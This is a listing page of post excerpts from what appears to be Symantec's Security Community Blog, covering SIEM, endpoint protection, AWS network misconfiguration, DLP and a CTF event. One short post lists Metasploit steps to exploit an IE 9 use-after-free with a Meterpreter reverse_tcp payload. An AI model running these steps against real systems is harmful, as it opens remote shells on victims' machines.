Video Screencast Help
Search Video Help Close Back
to help

Security Community Blog

Showing posts tagged with Symantec Security Information Manager
Showing posts in English
SSIM centralized event monitoring and unbeatable part of ISMS
Milan_T | 09 May 2013 | 0 comments

IT is tagged as a burden on business with huge annual expenses.

On the other hand businesses today face a considerable challenge to deliver ever-improving service levels to meet and exceed the expectations of their business users for service quality, availability, and security while optimizing resources and operations costs to manage and maintain the IT infrastructure. Monitoring and managing these increasingly complex infrastructures is a growing problem.

IT professional’s main challenge is to secure the increasingly time-intensive task of infrastructure and device management, increasing the overall availability of network resources to support broader use of converged technologies.

About ISMS:

Information Security Management System (ISMS) can foster efficient security cost management, compliance with laws and regulations, and a comfortable level of interoperability due to a common set of guidelines...

Read more
Evolving Endpoint Security
Vikram Kumar-SAV to SEP | 05 Feb 2013 | 0 comments

 

Symantec keeps tab on the changing Threat Landscape and incorporates relevant security on its products.Same is the story with SAV to SEP to now SEP 12..

When we had SAV in the market what our customer needed was just a Antivirus to protect their system from downtime..here antivirus was looked more as a Availability facilitator than a core security product..till early 2000.

Even though we had SCS (firewall and IPS) seclected people used the other features.

Starting from 2006-2007 that was a high rise in malware being created and vulnerabilities being exploited..slowly the trend changed and it all came down to money making malwares..

FakeAntivirus, Downadup, Various Blackmailing Trojans etc..here the audience was not high profile..and SEP 11 very well detect and blocks and does whatever it can..Slowly people started using IPS, ADC and found much more can be done with SEP and they are doing it..

However in last few years there has been...

Read more
WHERE BIG DATA AND SECURITY ALIGN
Al Cooley - DeepSight Product Management | 30 Jan 2013 | 0 comments

There has been a data explosion within security teams, as organisations everywhere seek to increase their effectiveness in preventing breaches of defences through improved correlation and data sharing. You have probably seen this happening within your own working environment, too.

In the quest to achieve this sought-after level of ‘good enough’ security, the findings of new research from the Enterprise Strategy Group, ‘Big Data Intersection with Security Analytics’, partially sponsored by Symantec, are encouraging.

You won’t be too surprised to hear that, in our ‘Big Data’ world, we are collecting a lot more data than we used to two years ago. There is only one direction in which that arrow is going to be pointing from now on. What is interesting here, though, is that lots of people are vested in this information to do their job – and that is likely to envelop even more people, across a wide range of roles over the next...

Read more
Vulnerabilities Arising From Misconfiguration in AWS Network Security Architectures
Deb Banerjee | 16 Nov 2012 | 0 comments

Amazon Web Services (AWS) clouds offer a variety networking security controls for segmenting and isolating EC2 instances running in that cloud. These controls address the following use cases

  1. Isolate EC2 instance from the public internet. E.g make those instances unaccessible from the public internet.
  2. Isolate EC2 instance belonging to an Enterprise from other EC2 instances belonging to other tenants.
  3. Within a tenant, isolate applications and departments from one another. This can be also be used to isolate application tiers from one another.
  4. Isolate applications and application tiers from one another within a tenants AWS network..

AWS Network Security Constructs

AWS offers a variety of networking constructs to implement these controls. These include VPC's, Gateways(Internet and VPN), NAT, Subnets, Routes, Security Groups and Elastic IP's.  These objects would be used to implement the above...

Read more
State of Cyber security
James Hanlon | 07 Dec 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hackitivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increased in web based attacks and an increased focus and intensity of advanced persistent...

Read more
Vulnerability
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Read more
Join the Symantec $25k Cyber Security Challenge in St. Louis
Elspeth Magoria | 06 Sep 2012 | 0 comments

Join Symantec and Washington University at the St. Louis Symantec $25k Cyber Security Challenge. This one-of-a-kind event invites security professionals and ethical hackers like yourself to help further improve current security technologies and solutions.

Come learn about the current global threat landscape and IT trends requiring organizations to take new approaches in security – cloud, mobility, compliance, etc.

Stay for the "Challenge", an exciting cyber "Capture the Flag" (CTF) simulation. Take part for a chance to win cash and prizes! And don't miss the Hands-On Security Demo Lab that will showcase current security solutions around mobile, data loss, encryption, email and web security and more.

Be There To Win - All registered attendees get a $50 Amazon.com Gift Card and if you refer two friends and they attend...

Read more
Learn How to Protect Your Hardest-to-Find IP with Intelligent DLP
Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

 

 

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
 
Here's the Link to see the Archived Version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com  to see all of...
Read more
Rule review an important task
Milan_T | 18 May 2012 | 1 comment

For Security rule requirements may very with respect to time. Like rule implemented once need to be modified or changed or must be reviewed piriodically.

If any new recuirements come to the picture it must be reviwed. I have SSIM in my organisation implemented before few years rules was as it is. Now security purpose and engineering approch needed to update it. so accordingly older rules must be updated, and if necessary it must be added new once for provideing better services.

Read more
Orchestration and Automation Enable Security in the Virtual Data Center
Deb Banerjee | 23 Feb 2012 | 0 comments

Traditionally information security has been reasoned in terms of assets, vulnerabilities and threats. A mature info-sec program has visibility into its critical assets, a compliance program for reducing its attacks surfaces and vulnerabilities therein, and in detecting and blocking threats.  A rich set of patterns and practices have emerged in supporting these for the physical (and static) data center. These include segmentation as a key practice for isolating higher-trust workloads (eg. PCI) from lower-trust workloads (e.g. test, VDI).  Another important aspect is change control  that surfaces through multi-step provisioning cycles and  change management processes. While these practices are important to ensuring compliance and minimizing attack surfaces, there have impacted IT's ability to respond to changing business requirements.  For example, physically segmented workloads create challenges in resource utilization e.g. ...

Read more